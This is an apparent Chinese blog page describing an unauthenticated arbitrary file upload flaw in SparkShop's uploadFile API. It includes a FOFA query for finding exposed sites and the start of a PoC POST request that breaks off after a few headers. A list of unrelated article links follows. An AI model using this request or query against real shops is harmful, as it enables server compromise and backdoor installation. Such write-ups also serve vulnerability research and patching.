当前位置: 首页 > news >正文

SparkShop开源商城 uploadFile 任意文件上传漏洞复现

0x01 产品简介

SparkShop开源商城(也被称为星火商城)是一款基于ThinkPHP6和Element UI的开源免费可商用的高性能商城系统。适用于各类电商场景,包括但不限于B2C商城、新零售、分销商城等。无论是初创企业还是成熟品牌,都可以通过SparkShop快速搭建个性化独立商城,实现线上线下的融合营销。

0x02 漏洞概述

SparkShop开源商城 uploadFile 接口存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

0x03 复现环境

FOFA:"SparkShop"

0x04 漏洞复现

PoC

POST /api/Common/uploadFile HTTP/2
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,a

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • LabVIEW项目中硬件选型与长期需求沟通
  • OSI七层模型中的数据链路层
  • 图像数据处理25
  • MySQL数据库用户管理和授权
  • 突发性网络攻击的安全挑战分析
  • 微软DP420认证,涉及SQL,C#,Java
  • Apache Kafka 简介、使用场景及特点
  • day-43 盛最多水的容器
  • Shell 脚本入门指南
  • xss-labs靶场通关详解
  • 【DSP+FPGA】基于DSP+FPGA XC7K325T与TMS320C6678的通用信号处理平台
  • 【软考】【多媒体应用设计师】媒体与技术2
  • useeffect和uselayout区别
  • HTTPS协议中的加密机制分析、证书认证
  • hadoop日志文件
  • 30天自制操作系统-2
  • CSS盒模型深入
  • Java 最常见的 200+ 面试题:面试必备
  • Objective-C 中关联引用的概念
  • Python进阶细节
  • Python学习之路16-使用API
  • Rancher-k8s加速安装文档
  • vue-cli在webpack的配置文件探究
  • 分享几个不错的工具
  • 力扣(LeetCode)357
  • 浅析微信支付:申请退款、退款回调接口、查询退款
  • 微信小程序设置上一页数据
  • Nginx实现动静分离
  • 回归生活:清理微信公众号
  • ​决定德拉瓦州地区版图的关键历史事件
  • # 消息中间件 RocketMQ 高级功能和源码分析(七)
  • #07【面试问题整理】嵌入式软件工程师
  • #if #elif #endif
  • (1)bark-ml
  • (aiohttp-asyncio-FFmpeg-Docker-SRS)实现异步摄像头转码服务器
  • (bean配置类的注解开发)学习Spring的第十三天
  • (蓝桥杯每日一题)平方末尾及补充(常用的字符串函数功能)
  • (十二)python网络爬虫(理论+实战)——实战:使用BeautfulSoup解析baidu热搜新闻数据
  • (学习日记)2024.03.12:UCOSIII第十四节:时基列表
  • (一)Mocha源码阅读: 项目结构及命令行启动
  • ****Linux下Mysql的安装和配置
  • .NET Core实战项目之CMS 第一章 入门篇-开篇及总体规划
  • .net 无限分类
  • .net 写了一个支持重试、熔断和超时策略的 HttpClient 实例池
  • .NET正则基础之——正则委托
  • .skip() 和 .only() 的使用
  • @ConditionalOnProperty注解使用说明
  • @RequestMapping用法详解
  • @serverendpoint注解_SpringBoot 使用WebSocket打造在线聊天室(基于注解)
  • @test注解_Spring 自定义注解你了解过吗?
  • [2024] 十大免费电脑数据恢复软件——轻松恢复电脑上已删除文件
  • [52PJ] Java面向对象笔记(转自52 1510988116)
  • [AI Google] Ask Photos: 使用Gemini搜索照片的新方法
  • [AI]文心一言爆火的同时,ChatGPT带来了这么多的开源项目你了解吗
  • [Algorithm][综合训练][kotori和气球][体操队形][二叉树中的最大路径和]详细讲解